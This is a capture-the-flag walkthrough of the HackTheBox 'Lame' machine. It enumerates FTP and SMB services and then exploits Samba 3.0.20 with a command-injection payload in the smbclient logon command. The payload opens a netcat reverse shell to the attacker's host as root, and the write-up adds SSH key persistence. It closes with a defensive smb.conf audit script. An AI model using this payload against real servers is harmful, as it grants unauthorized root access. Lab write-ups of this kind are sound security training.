HackTheBox - Lame

Morten Hansen • January 30, 2022

LAME

IP: 10.10.10.3

NMAP

21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame

Connect to FTP with:

ftp 10.10.10.3
anonymous

The anonymous login gives us nothing, so we continue enumerating and turn to the SMB server.

nmap --script "safe or smb-enum-*" -p 445 10.10.10.3

Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-10 16:58 EDT
Pre-scan script results:
| broadcast-dns-service-discovery: 
|   224.0.0.251
|     55584/tcp companion-link
|_      Address=172.16.202.1 fe80::10b4:b9cd:52c2:ad33

Enumerate the SMB shares and their permissions with smbmap.

smbmap -H 10.10.10.3
[+] IP: 10.10.10.3:445  Name: lame.hackthebox.gr
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        tmp                                                     READ, WRITE     oh noes!
        opt                                                     NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$                                                  NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))

The tmp share is readable and writable without credentials, so we connect to it with:

smbclient \\\\10.10.10.3\\tmp\\

From the smbclient prompt, we obtain a reverse connection with the logon command:

logon "/=`nc '10.10.16.4' 4444 -e /bin/bash`"

Before running it, start a listener in another terminal with nc -lvnp 4444 to catch the reverse connection.

Once the connection comes back, whoami shows that we are already root, so the machine is complete and we can collect both flags. Optionally, we can drop our SSH public key into /root/.ssh/authorized_keys and log in to the machine as root over SSH.

To get a more useful shell, I use python -c "import pty; pty.spawn('/bin/bash')". Since the machine is old, the interpreter is called python, not python3.
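As an added defensive check that is not part of the original writeup: a small smb.conf audit that flags the two conditions behind the findings above, a share that anonymous clients can write to (like tmp) and a username map script directive, which hands client-supplied usernames to an external command. The sample configuration is constructed for this example and is an assumption, not the box's real config.

```python
import configparser
import io

# Constructed sample smb.conf mirroring what smbmap reported above:
# an anonymously writable "tmp" share plus a username map script.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server string = lame server
   username map script = /etc/samba/scripts/mapusers.sh
   security = user

[tmp]
   comment = oh noes!
   path = /tmp
   read only = no
   guest ok = yes

[opt]
   path = /opt
   valid users = root
"""

TRUE_VALUES = {"yes", "true", "1"}


def _flag(section, key, default="no"):
    # smb.conf booleans are case-insensitive; accept the common spellings.
    return section.get(key, default).strip().lower() in TRUE_VALUES


def audit_smb_conf(text):
    """Return (share, finding) tuples a defender should review."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.read_file(io.StringIO(text))
    findings = []
    # The username map script is run as an external command with the
    # client-supplied username substituted in; worth reviewing on any host.
    if parser.has_option("global", "username map script"):
        findings.append(("global", "username map script is set"))
    for share in parser.sections():
        if share == "global":
            continue
        sec = parser[share]
        guest = _flag(sec, "guest ok") or _flag(sec, "public")
        writable = (_flag(sec, "writable") or _flag(sec, "writeable")
                    or not _flag(sec, "read only", default="yes"))
        if guest and writable:
            findings.append((share, "anonymous write access"))
    return findings
```

Run it against /etc/samba/smb.conf on a host you administer; an empty list means neither condition is present.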